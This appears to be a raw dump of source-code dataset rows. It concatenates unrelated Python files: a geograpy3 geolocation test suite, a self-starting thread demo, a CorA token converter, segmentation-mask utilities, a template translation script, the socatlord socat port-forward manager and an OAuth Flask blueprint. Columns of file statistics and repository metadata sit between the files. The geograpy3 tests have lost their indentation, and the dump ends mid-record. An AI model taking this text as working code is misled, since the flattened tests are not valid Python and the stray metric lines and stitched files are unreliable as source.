for view in ["CityLookup","RegionLookup","CountryLookup"]:
self.assertTrue(view in viewsMap)
def testCityLookup(self):
'''
test the cityLookup to city/region/country object cluster
'''
cityLookupRecords=self.lookupQuery("CityLookup", "label in ('Berlin','Paris','Athens','Singapore')")
expected=[("Berlin",3644000),("Paris",2175000),("Athens",600000),("Singapore",5800000)]
self.checkExpected(cityLookupRecords,expected)
def testRegionLookup(self):
'''
test region Lookup
'''
regionLookupRecords=self.lookupQuery("RegionLookup", "label in ('CA')")
expected=[("California",39000000)]
self.checkExpected(regionLookupRecords,expected)
def testCountryLookup(self):
'''
test country Lookup
'''
#self.debug=True
countryLookupRecords=self.lookupQuery("CountryLookup", "label in ('CA')")
expected=[("Canada",37000000)]
self.checkExpected(countryLookupRecords,expected)
def testIsoRegexp(self):
'''
test regular expression for iso codes
'''
loc=Locator.getInstance()
self.assertFalse(loc.isISO('Singapore'))
query="""
select distinct iso from countries
union
select distinct iso from regions
"""
loc.populate_db()
isocodeRecords=loc.sqlDB.query(query)
for isocodeRecord in isocodeRecords:
isocode=isocodeRecord['iso']
if isocode:
isIso=loc.isISO(isocode)
if not isIso and self.debug:
print(isocode)
self.assertTrue(isIso)
def testWordCount(self):
'''
test the word count
'''
loc=Locator.getInstance()
query="SELECT name from CITIES"
nameRecords=loc.sqlDB.query(query)
if self.debug:
print ("testWordCount: found %d names" % len(nameRecords))
wc=Counter()
for nameRecord in nameRecords:
name=nameRecord['name']
words=re.split(r"\W+",name)
wc[len(words)]+=1
if self.debug:
print ("most common 20: %s" % wc.most_common(20))
def testUML(self):
'''
test adding population data from wikidata to GeoLite2 information
'''
Locator.resetInstance()
loc=Locator.getInstance()
loc.populate_db()
user=getpass.getuser()
if self.debug:
print ("current user is %s" % user)
tableList=loc.sqlDB.getTableList()
uml=UML()
title="""geograpy Tables
2021-08-13
[[https://github.com/somnathrakshit/geograpy3 © 2020-2021 geograpy3 project]]"""
plantUml=uml.tableListToPlantUml(tableList,title=title, packageName="geograpy3")
showUml=True
if showUml or self.debug:
print (plantUml)
def checkExamples(self,examples,countries,debug=False,check=True):
'''
check that the given example give results in the given countries
Args:
examples(list): a list of example location strings
countries(list): a list of expected country iso codes
'''
for index,example in enumerate(examples):
city=geograpy.locateCity(example,debug=debug)
if self.debug:
print("%3d: %22s->%s" % (index,example,city))
if check:
self.assertEqual(countries[index],city.country.iso)
def testGetCountry(self):
'''
test getting a country by name or ISO
'''
locator=Locator()
debug=True
examples=[("DE","Germany"),("US","United States of America"),("USA",None)]
for name,expectedName in examples:
country=locator.getCountry(name)
if debug:
print(country)
if expectedName is None:
self.assertIsNone(country)
else:
self.assertIsNotNone(country)
self.assertEqual(expectedName,country.name)
def testIssue15(self):
'''
https://github.com/somnathrakshit/geograpy3/issues/15
test Issue 15 Disambiguate via population, gdp data
'''
examples=['Paris','Vienna', 'Berlin']
countries=['FR','AT', 'DE']
self.checkExamples(examples, countries)
pass
def testIssue17(self):
'''
test issue 17:
https://github.com/somnathrakshit/geograpy3/issues/17
[BUG] San Francisco, USA and Auckland, New Zealand should be locatable #17
'''
examples=['San Francisco, USA','Auckland, New Zealand']
countries=['US','NZ']
self.checkExamples(examples, countries)
def testIssue19(self):
'''
test issue 19
'''
examples=['Puebla City, Mexico','Newcastle, UK','San Juan, Puerto Rico']
countries=['MX','GB','US']
# For Puerto Rico exist two iso codes one as country and one as US region see https://en.wikipedia.org/wiki/Puerto_Rico in the dataset it is recognized as US region
self.checkExamples(examples, countries)
def testStackOverflow64379688(self):
'''
compare old and new geograpy interface
'''
examples=['John Doe 160 Huntington Terrace Newark, New York 07112 United States of America',
'John Doe 30 Huntington Terrace Newark, New York 07112 USA',
'John Doe 22 Huntington Terrace Newark, New York 07112 US',
'Mario Bianchi, Via Nazionale 256, 00148 Roma (RM) Italia',
'Mario Bianchi, Via Nazionale 256, 00148 Roma (RM) Italy',
'Newark','Rome']
for example in examples:
city=geograpy.locateCity(example,debug=False)
if self.debug:
print(city)
def testStackOverflow64418919(self):
'''
https://stackoverflow.com/questions/64418919/problem-retrieving-region-in-us-with-geograpy3
'''
examples=['Seattle']
for example in examples:
city=geograpy.locateCity(example,debug=False)
print(city)
def testProceedingsExample(self):
'''
test a proceedings title Example
'''
examples=['''Proceedings of the
IEEE 14th International Conference on
Semantic Computing, ICSC 2020,
San Diego, CA, USA,
February 3-5, 2020''']
for example in examples:
places = geograpy.get_place_context(text=example)
if self.debug:
print(places)
city=geograpy.locateCity(example,debug=False)
if self.debug:
print(city)
def testDelimiters(self):
'''
test the delimiter statistics for names
'''
loc=Locator.getInstance()
loc.populate_db()
ddls=["DROP VIEW IF EXISTS allNames","""CREATE VIEW allNames as select name from countries
union select name from regions
union select name from cities"""]
for ddl in ddls:
loc.sqlDB.execute(ddl)
query="SELECT name from allNames"
nameRecords=loc.sqlDB.query(query)
show=self.debug
show=True
if show:
print("found %d name records" % len(nameRecords))
ordC=Counter()
for nameRecord in nameRecords:
name=nameRecord["name"]
for char in name:
code=ord(char)
if code<ord("A"):
ordC[code]+=1
for index,countT in enumerate(ordC.most_common(10)):
code,count=countT
if show:
print ("%d: %d %s -> %d" % (index,code,chr(code),count))
def testIssue22(self):
'''
https://github.com/somnathrakshit/geograpy3/issues/22
'''
url='https://en.wikipedia.org/wiki/2012_Summer_Olympics_torch_relay'
places = geograpy.get_geoPlace_context(url = url)
if self.debug:
print(places)
self.assertTrue(len(places.countries)>5)
self.assertTrue(len(places.regions)>5)
self.assertTrue(len(places.cities)>20)
def testExamples(self):
'''
test examples
'''
examples=['Paris, US-TX','Amsterdam, Netherlands', 'Vienna, Austria','Vienna, Illinois, US','Paris, Texas',
'Austin, TX','Austin, Texas',
]
countries=['US','NL','AT','US','US','US','US']
self.checkExamples(examples, countries,debug=False)
def testIssue41_CountriesFromErdem(self):
'''
test getting Country list from Erdem
'''
countryList=CountryManager.fromErdem()
self.assertEqual(247,len(countryList.countries))
if self.debug:
for country in countryList.countries:
print(country)
def testIssue_42_distance(self):
'''
test haversine and location
'''
loc1=Location()
loc1.lat=0
loc1.lon=0
loc2=Location()
loc2.lat=90
loc2.lon=0
d=loc1.distance(loc2)
#self.debug=True
if self.debug:
print(d)
self.assertAlmostEqual(10007.54,d,delta=0.1)
def testIssue_59_db_download(self):
'''
tests the correct downloading of the backup database in different configurations
'''
def getConfig(tmpdir:str):
config=StorageConfig(cacheFile="locations.db", cacheDirName="geograpyTest", cacheRootDir=tmpdir)
config.cacheFile=f"{config.getCachePath()}/{config.cacheFile}"
return config
def downloadAndTestDB(config:StorageConfig, loc:Locator=None, forceUpdate:bool=False):
'''downloads and tests the downloaded db'''
if loc is None:
loc = Locator(storageConfig=config)
loc.downloadDB(forceUpdate=forceUpdate)
self.assertTrue(os.path.exists(config.cacheFile))
self.assertTrue(loc.db_has_data())
return loc
# test downloading with no file in dir
with tempfile.TemporaryDirectory() as tmpdir:
config=getConfig(tmpdir)
downloadAndTestDB(config)
# test downloading with empty file in dir
with tempfile.TemporaryDirectory() as tmpdir:
config=getConfig(tmpdir)
Path(config.cacheFile).touch() # create empty file
loc=downloadAndTestDB(config)
# test downloading with forceUpdate
            # drop an important table to check whether it is restored
loc.sqlDB.execute("DROP TABLE countries")
self.assertFalse(loc.db_has_data())
downloadAndTestDB(config,loc=loc, forceUpdate=True)
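# A minimal cross-check for testIssue_42_distance (added sketch, not part of
# the original suite): for a sphere with the common mean earth radius
# R = 6371 km, the pole-to-equator great-circle distance is pi * R / 2,
# which matches the 10007.54 km asserted above.
def _quarter_meridian_km(radius_km: float = 6371.0) -> float:
    import math
    return math.pi * radius_km / 2  # ~ 10007.54 for radius_km = 6371.0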
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
| 34.190736
| 172
| 0.582483
| 1,302
| 12,548
| 5.589862
| 0.307988
| 0.019786
| 0.023083
| 0.021984
| 0.173124
| 0.119401
| 0.083952
| 0.071036
| 0.046579
| 0.046579
| 0
| 0.026004
| 0.313516
| 12,548
| 366
| 173
| 34.284153
| 0.818783
| 0.1354
| 0
| 0.194915
| 0
| 0
| 0.167317
| 0.007898
| 0
| 0
| 0
| 0
| 0.067797
| 1
| 0.105932
| false
| 0.012712
| 0.050847
| 0
| 0.173729
| 0.072034
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9fafb5b1dfbe210783fd95968a164f6159dfcac
| 685
|
py
|
Python
|
Python/threadingProcess.py
|
GuruprasadaShridharHegde/Coder-Mansion
|
14529a6d5d4e674ecaf0c771e9cc428ba34b0a2d
|
[
"MIT"
] | 1
|
2022-01-19T04:22:21.000Z
|
2022-01-19T04:22:21.000Z
|
Python/threadingProcess.py
|
GuruprasadaShridharHegde/Coder-Mansion
|
14529a6d5d4e674ecaf0c771e9cc428ba34b0a2d
|
[
"MIT"
] | null | null | null |
Python/threadingProcess.py
|
GuruprasadaShridharHegde/Coder-Mansion
|
14529a6d5d4e674ecaf0c771e9cc428ba34b0a2d
|
[
"MIT"
] | null | null | null |
# example of automatically starting a thread
from time import sleep
from threading import Thread
# custom thread class that automatically starts threads when they are constructed
class AutoStartThread(Thread):
# constructor
def __init__(self, *args, **kwargs):
        # call the parent constructor
super().__init__(*args, **kwargs)
# start the thread
self.start()
# task function
def task():
print('Task starting')
# block for a moment
sleep(1)
# report
print('Task all done')
# create and start the new thread
thread = AutoStartThread(target=task)
# wait for the new thread to finish
thread.join()
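# A follow-up sketch (not part of the original snippet): AutoStartThread
# forwards *args/**kwargs to Thread, so target arguments work as usual.
# The greet() function is hypothetical, added only for illustration.
def greet(name):
    print('Hello, %s' % name)
# the thread starts on construction, so only join() is needed afterwards
AutoStartThread(target=greet, args=('world',)).join()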
| 27.4
| 82
| 0.668613
| 85
| 685
| 5.294118
| 0.588235
| 0.044444
| 0.053333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.001957
| 0.254015
| 685
| 25
| 83
| 27.4
| 0.878669
| 0.421898
| 0
| 0
| 0
| 0
| 0.071823
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.166667
| 0
| 0.416667
| 0.166667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9fbf38f83d878c53f0d81d49f3d590917067274
| 4,332
|
py
|
Python
|
bin/cora_edit_singletoken.py
|
comphist/cora
|
71555df9a520ccab063a8c5eb907feaa1dd88b38
|
[
"MIT"
] | 10
|
2017-07-08T12:05:32.000Z
|
2019-09-22T17:39:12.000Z
|
bin/cora_edit_singletoken.py
|
comphist/cora
|
71555df9a520ccab063a8c5eb907feaa1dd88b38
|
[
"MIT"
] | 31
|
2017-02-24T19:29:51.000Z
|
2020-11-09T15:58:44.000Z
|
bin/cora_edit_singletoken.py
|
comphist/cora
|
71555df9a520ccab063a8c5eb907feaa1dd88b38
|
[
"MIT"
] | 7
|
2017-02-27T12:25:55.000Z
|
2022-01-13T08:55:01.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2015 Marcel Bollmann <bollmann@linguistics.rub.de>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import sys
import json
import argparse
def splitAt(token, symbol):
result = token.split(symbol)
if len(result) < 2:
return result
return [x+symbol for x in result[:-1]] + [result[-1]]
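# A short worked example of splitAt (derived from the code above, shown as
# comments only): the split symbol is kept at the end of every part except
# the last.
#   splitAt("vnde|sagete", "|")  ->  ["vnde|", "sagete"]
#   splitAt("vnde", "|")         ->  ["vnde"]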
class MainApplication(object):
def __init__(self, args):
if args.split:
self.split_mod = "|"
self.split_dipl = "#"
else:
self.split_mod = args.split_mod
self.split_dipl = args.split_dipl
self.lines = [x.strip() for x in args.infile.readlines()]
self.token = ' '.join(self.lines)
args.infile.close()
def throw_error(self, error):
print(error)
exit(1)
def performConversions(self):
result = {}
if self.split_mod:
modern = self.token.split(self.split_mod)
result['mod_ascii'] = result['mod_utf'] = \
[m.replace(self.split_dipl, '') for m in modern]
result['mod_trans'] = [m+self.split_mod for m in modern[:-1]] + [modern[-1]]
else:
result['mod_trans'] = result['mod_ascii'] = \
result['mod_utf'] = [self.token]
if self.split_dipl:
dipl = self.token.split(self.split_dipl)
result['dipl_utf'] = [d.replace(self.split_mod, '') for d in dipl]
result['dipl_trans'] = [d+self.split_dipl for d in dipl[:-1]] + [dipl[-1]]
result['dipl_breaks'] = [0] * len(dipl)
else:
result['dipl_trans'] = result['dipl_utf'] = [self.token]
result['dipl_breaks'] = [0]
return result
def run(self):
result = self.performConversions()
print(json.dumps(result))
if __name__ == '__main__':
description = "Reads a file containing a single token and returns it unchanged in JSON format. Intended to be called from within CorA."
epilog = ""
parser = argparse.ArgumentParser(description=description, epilog=epilog)
parser.add_argument('infile',
metavar='INPUT',
nargs='?',
default=sys.stdin,
type=argparse.FileType('r'),
help='Input file')
# exists for legacy reasons:
parser.add_argument('-s', '--split',
action='store_true',
default=False,
help=('Parse pipe (|) and hash (#) as tokenization symbols; '
'equivalent to --split-mod="|" --split-dipl="#"'))
parser.add_argument('--split-mod',
default='',
type=str,
help='Symbol to split into two moderns (default: None)')
parser.add_argument('--split-dipl',
default='',
type=str,
help='Symbol to split into two dipls (default: None)')
# parser.add_argument('-e', '--encoding',
# default='utf-8',
# help='Encoding of the input file (default: utf-8)')
arguments = parser.parse_args()
# launching application ...
MainApplication(arguments).run()
| 40.111111
| 140
| 0.593029
| 526
| 4,332
| 4.796578
| 0.385932
| 0.042806
| 0.028537
| 0.013476
| 0.107808
| 0.050733
| 0.030123
| 0.030123
| 0.030123
| 0
| 0
| 0.005559
| 0.29409
| 4,332
| 107
| 141
| 40.485981
| 0.81949
| 0.308172
| 0
| 0.130435
| 0
| 0.014493
| 0.167227
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.072464
| false
| 0
| 0.043478
| 0
| 0.173913
| 0.028986
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9ff48db97e05614b8ced49da35379affb1221e8
| 1,851
|
py
|
Python
|
datasets/utils.py
|
lulindev/UNet-pytorch
|
cf91e251891a2926f46b628985ebdda66bc637a2
|
[
"MIT"
] | 3
|
2021-04-07T08:05:44.000Z
|
2021-06-25T16:55:56.000Z
|
datasets/utils.py
|
lulindev/UNet-pytorch
|
cf91e251891a2926f46b628985ebdda66bc637a2
|
[
"MIT"
] | null | null | null |
datasets/utils.py
|
lulindev/UNet-pytorch
|
cf91e251891a2926f46b628985ebdda66bc637a2
|
[
"MIT"
] | 2
|
2021-08-19T10:23:32.000Z
|
2021-12-15T03:26:11.000Z
|
from typing import Union
import matplotlib.pyplot as plt
import torch
import torchvision
def decode_segmap_to_color_image(masks: torch.Tensor,
colormap: Union[list, tuple],
num_classes: int,
ignore_index: int = None,
ignore_color: Union[list, tuple] = None):
    # clone the mask once per channel so each can be decoded independently
r = masks.clone()
g = masks.clone()
b = masks.clone()
    # Assign colors according to class for each channel
for i in range(num_classes):
r[masks == i] = colormap[i][0]
g[masks == i] = colormap[i][1]
b[masks == i] = colormap[i][2]
    # "is not None" so that an ignore_index of 0 is still honored
    if ignore_index is not None and ignore_color is not None:
r[masks == ignore_index] = ignore_color[0]
g[masks == ignore_index] = ignore_color[1]
b[masks == ignore_index] = ignore_color[2]
decoded_masks = (r.unsqueeze(dim=1), g.unsqueeze(dim=1), b.unsqueeze(dim=1))
decoded_masks = torch.cat(decoded_masks, dim=1).to(torch.float32)
decoded_masks /= 255
return decoded_masks
# Validate dataset loading code
def show_dataset(images: torch.Tensor, targets: torch.Tensor):
to_pil_image = torchvision.transforms.ToPILImage()
plt.rcParams['figure.figsize'] = (17, 6)
plt.rcParams['figure.autolayout'] = True
plt.rcParams['xtick.bottom'] = False
plt.rcParams['xtick.labelbottom'] = False
plt.rcParams['ytick.left'] = False
plt.rcParams['ytick.labelleft'] = False
assert images.shape[0] == targets.shape[0]
for i in range(images.shape[0]):
fig, axs = plt.subplots(1, 2)
axs[0].set_title('Input image')
axs[0].imshow(to_pil_image(images[i].cpu()))
axs[1].set_title('Groundtruth')
axs[1].imshow(targets[i].cpu())
plt.show()
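# A minimal usage sketch (assumed toy values, not part of the original
# module): decode a random two-class mask into an RGB tensor.
if __name__ == '__main__':
    toy_masks = torch.randint(0, 2, (1, 4, 4))   # (N, H, W) class indices
    toy_colormap = [(0, 0, 0), (255, 0, 0)]      # class 0 -> black, class 1 -> red
    rgb = decode_segmap_to_color_image(toy_masks, toy_colormap, num_classes=2)
    print(rgb.shape)  # torch.Size([1, 3, 4, 4])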
| 35.596154
| 81
| 0.611021
| 252
| 1,851
| 4.376984
| 0.396825
| 0.059837
| 0.038078
| 0.040798
| 0.073436
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019737
| 0.26094
| 1,851
| 51
| 82
| 36.294118
| 0.78655
| 0.067531
| 0
| 0
| 0
| 0
| 0.062137
| 0
| 0
| 0
| 0
| 0
| 0.025
| 1
| 0.05
| false
| 0
| 0.1
| 0
| 0.175
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9ffd31b49092a967f11f75892dae5ddf2b9ea57
| 1,373
|
py
|
Python
|
src/lm_based/translate_start_end.py
|
vered1986/time_expressions
|
32d182d7f741eec007141f5ca89c0d419e23a9a7
|
[
"Apache-2.0"
] | 1
|
2022-02-25T15:00:42.000Z
|
2022-02-25T15:00:42.000Z
|
src/lm_based/translate_start_end.py
|
vered1986/time_expressions
|
32d182d7f741eec007141f5ca89c0d419e23a9a7
|
[
"Apache-2.0"
] | null | null | null |
src/lm_based/translate_start_end.py
|
vered1986/time_expressions
|
32d182d7f741eec007141f5ca89c0d419e23a9a7
|
[
"Apache-2.0"
] | null | null | null |
import os
import json
import logging
import argparse
from src.common.translate import translate_time_expression_templates, get_client
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s', level=logging.INFO)
logger = logging.getLogger(__name__)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--template_dir", default="data/templates/start_end", help="Templates directory")
parser.add_argument("--lang", default=None, type=str, required=False,
help="Language code. If not specified, computes for all")
args = parser.parse_args()
translate_client = get_client()
# Iterate over languages
if args.lang is not None:
target_langs = [args.lang]
else:
        target_langs = [f.replace(".json", "") for f in os.listdir(args.template_dir) if f != "en.json"]
en_templates = json.load(open(f"{args.template_dir}/en.json"))
for target in target_langs:
logger.info(target)
target_templates = {}
for edge in ["start", "end"]:
target_templates[edge] = translate_time_expression_templates(translate_client, en_templates[edge], target)
with open(f"{args.template_dir}/{target}.json", "w") as f_out:
json.dump(target_templates, f_out, ensure_ascii=False)
if __name__ == '__main__':
main()
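# Example invocation (hypothetical paths, comments only): translating the
# English start/end templates into German with the client from get_client():
#   python -m src.lm_based.translate_start_end \
#       --template_dir data/templates/start_end --lang de
# This reads data/templates/start_end/en.json and writes de.json next to it.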
| 32.690476
| 118
| 0.680991
| 179
| 1,373
| 4.994413
| 0.430168
| 0.036913
| 0.051454
| 0.071588
| 0.044743
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.191551
| 1,373
| 41
| 119
| 33.487805
| 0.805405
| 0.016023
| 0
| 0
| 0
| 0
| 0.201631
| 0.080059
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.178571
| 0
| 0.214286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a001a953fb7ca73d48a5c0947ed5285912738fe8
| 3,612
|
py
|
Python
|
socatlord/operations.py
|
Cervi-Robotics/socatlord
|
e4d8964cb696c789807d2276698d596dfb68dc2b
|
[
"MIT"
] | 2
|
2021-05-30T01:05:38.000Z
|
2021-12-21T21:20:00.000Z
|
socatlord/operations.py
|
Cervi-Robotics/socatlord
|
e4d8964cb696c789807d2276698d596dfb68dc2b
|
[
"MIT"
] | null | null | null |
socatlord/operations.py
|
Cervi-Robotics/socatlord
|
e4d8964cb696c789807d2276698d596dfb68dc2b
|
[
"MIT"
] | 2
|
2021-05-30T01:05:44.000Z
|
2021-12-21T21:19:46.000Z
|
import os
import subprocess
import sys
import time
import pkg_resources
from satella.coding import silence_excs
from satella.coding.sequences import smart_enumerate
from satella.files import write_to_file, read_in_file
from socatlord.parse_config import parse_etc_socatlord
def install_socatlord(verbose: bool = False) -> None:
filename = pkg_resources.resource_filename(__name__, 'systemd/socatlord.service')
contents = read_in_file(filename, 'utf-8')
if verbose:
print('Writing /lib/systemd/system/socatlord.service')
write_to_file('/lib/systemd/system/socatlord.service', contents, 'utf-8')
if verbose:
print('Calling systemctl daemon-reload')
os.system('systemctl daemon-reload')
if verbose:
print('Calling systemctl enable socatlord.service')
os.system('systemctl enable socatlord.service')
def start_all_socats(config_file: str, verbose: bool = False) -> None:
processes_and_args = []
for i, proto, host1, port1, host2, port2 in smart_enumerate(parse_etc_socatlord(config_file)):
command = ['socat', '%s-listen:%s,bind=%s,reuseaddr,fork' % (proto, port1, host1),
'%s:%s:%s' % (proto, host2, port2)]
kwargs = {'stdin': subprocess.DEVNULL, 'stdout': subprocess.DEVNULL,
'stderr': subprocess.DEVNULL}
        if verbose:
            print('Calling %s' % (command,))
            kwargs = {}  # in verbose mode, let socat inherit stdout/stderr
proc = subprocess.Popen(command, **kwargs)
processes_and_args.append((proc, command))
write_to_file(os.path.join('/var/run/socatlord', str(i)), str(proc.pid), 'utf-8')
if verbose:
print('All socats launched, checking for liveness...')
time.sleep(1)
    for i, proc, cmd in smart_enumerate(processes_and_args):
        # wait(timeout=0.0) raises TimeoutExpired for processes that are
        # still alive; silence_excs swallows that, so the body below only
        # runs for socats that have already died
        with silence_excs(subprocess.TimeoutExpired):
            proc.wait(timeout=0.0)
            rc = proc.returncode
            print('socat no %s (PID %s) died (RC=%s), command was "%s", aborting' % (i+1, proc.pid,
                                                                                     rc, cmd))
            os.unlink(os.path.join('/var/run/socatlord', str(i)))
            sys.exit(1)
if verbose:
print('All socats alive, finishing successfully')
def do_precheck(config_file: str, verbose: bool = False):
if os.geteuid():
print('Must run as root. Aborting.')
sys.exit(1)
if not os.path.exists(config_file):
write_to_file(config_file, b'''# Put your redirections here
# eg.
# 443 -> 192.168.1.1:443
# will redirect all TCP traffic that comes to this host (0.0.0.0) to specified host and port
# to redirect UDP traffic just prefix your config with udp, eg.
# udp 443 -> 192.168.1.1:443
# You can additionally specify explicit interfaces to listen on eg.
# 192.168.1.2:443 -> 192.168.1.1:443
''')
if verbose:
print('%s created' % (config_file,))
if not os.path.exists('/var/run/socatlord'):
if verbose:
print('Making directory /var/run/socatlord')
os.mkdir('/var/run/socatlord')
os.chmod('/var/run/socatlord', 0o600)
def kill_all_socats(verbose: bool = False):
for socat in os.listdir('/var/run/socatlord'):
path = os.path.join('/var/run/socatlord', socat)
pid = int(read_in_file(path, 'utf-8'))
try:
if verbose:
print('Killing %s' % (pid, ))
os.kill(pid, 9)
except PermissionError:
print('Failed to kill %s with EPERM' % (pid, ))
except OSError:
print('Failed to kill %s' % (pid, ))
os.unlink(path)
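# A worked example (derived from start_all_socats above, comments only):
# assuming parse_etc_socatlord yields ('tcp', '0.0.0.0', 443, '192.168.1.1', 443)
# for a config line such as "443 -> 192.168.1.1:443", the spawned command is
#   socat tcp-listen:443,bind=0.0.0.0,reuseaddr,fork tcp:192.168.1.1:443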
| 36.857143
| 99
| 0.622647
| 476
| 3,612
| 4.621849
| 0.336134
| 0.036818
| 0.057273
| 0.017727
| 0.204091
| 0.083182
| 0.026364
| 0.026364
| 0
| 0
| 0
| 0.028361
| 0.248339
| 3,612
| 97
| 100
| 37.237113
| 0.781952
| 0
| 0
| 0.135802
| 0
| 0.024691
| 0.299834
| 0.037099
| 0
| 0
| 0
| 0
| 0
| 1
| 0.049383
| false
| 0
| 0.111111
| 0
| 0.160494
| 0.160494
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a002a3319b840c90608c40a67a87ec1a46bcac4f
| 2,303
|
py
|
Python
|
src/authutils/oauth2/client/blueprint.py
|
dvenckusuchgo/authutils
|
4b43a250f448815f1ea0e7fa22fa0b02c9a2cb1d
|
[
"Apache-2.0"
] | null | null | null |
src/authutils/oauth2/client/blueprint.py
|
dvenckusuchgo/authutils
|
4b43a250f448815f1ea0e7fa22fa0b02c9a2cb1d
|
[
"Apache-2.0"
] | 31
|
2018-02-12T22:32:49.000Z
|
2022-01-06T21:39:44.000Z
|
src/authutils/oauth2/client/blueprint.py
|
dvenckusuchgo/authutils
|
4b43a250f448815f1ea0e7fa22fa0b02c9a2cb1d
|
[
"Apache-2.0"
] | 2
|
2021-01-05T22:54:28.000Z
|
2021-11-29T20:57:20.000Z
|
"""
Provide a basic set of endpoints for an application to implement OAuth client
functionality.
These endpoints assume that the ``current_app`` has already been configured
with an OAuth client instance from the ``authlib`` package as follows:
.. code-block:: python
from authutils.oauth2.client import OAuthClient
from service.api import app
app.oauth_client = OAuthClient(
'client-id',
client_secret='...',
api_base_url='https://api.auth.net/',
access_token_url='https://auth.net/oauth/token',
authorize_url='https://auth.net/oauth/authorize',
client_kwargs={
'scope': 'openid data user',
'redirect_uri': 'https://service.net/authorize',
},
)
(NOTE the scopes are space-separated.)
"""
from urllib.parse import urljoin
from cdiserrors import APIError
import flask
from flask import current_app
import authutils.oauth2.client.authorize
blueprint = flask.Blueprint("oauth", __name__)
@blueprint.route("/authorization_url", methods=["GET"])
def get_authorization_url():
"""
Provide a redirect to the authorization endpoint from the OP.
"""
# This will be the value that was put in the ``client_kwargs`` in config.
redirect_uri = current_app.oauth_client.session.redirect_uri
# Get the authorization URL and the random state; save the state to check
# later, and return the URL.
authorization_url, state = current_app.oauth_client.generate_authorize_redirect(
redirect_uri
)
flask.session["state"] = state
return authorization_url
@blueprint.route("/authorize", methods=["GET"])
def do_authorize():
"""
Send a token request to the OP.
"""
authutils.oauth2.client.authorize.client_do_authorize()
return "", 204
@blueprint.route("/logout", methods=["GET"])
def logout_oauth():
"""
Log out the user.
To accomplish this, just revoke the refresh token if provided.
"""
url = urljoin(current_app.config.get("USER_API"), "/oauth2/revoke")
token = flask.request.form.get("token")
try:
current_app.oauth_client.session.revoke_token(url, token)
except APIError as e:
msg = "could not log out, failed to revoke token: {}".format(e.message)
return msg, 400
return "", 204
| 28.7875
| 84
| 0.685627
| 297
| 2,303
| 5.185185
| 0.397306
| 0.042857
| 0.036364
| 0.040909
| 0.062338
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007081
| 0.202779
| 2,303
| 79
| 85
| 29.151899
| 0.831699
| 0.489796
| 0
| 0.071429
| 0
| 0
| 0.112903
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.107143
| false
| 0
| 0.178571
| 0
| 0.428571
| 0.142857
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a005db92c36fe0ec0c9db64cfb4a8341416d95de
| 24,671
|
py
|
Python
|
catalog/bindings/csw/dictionary_entry_type.py
|
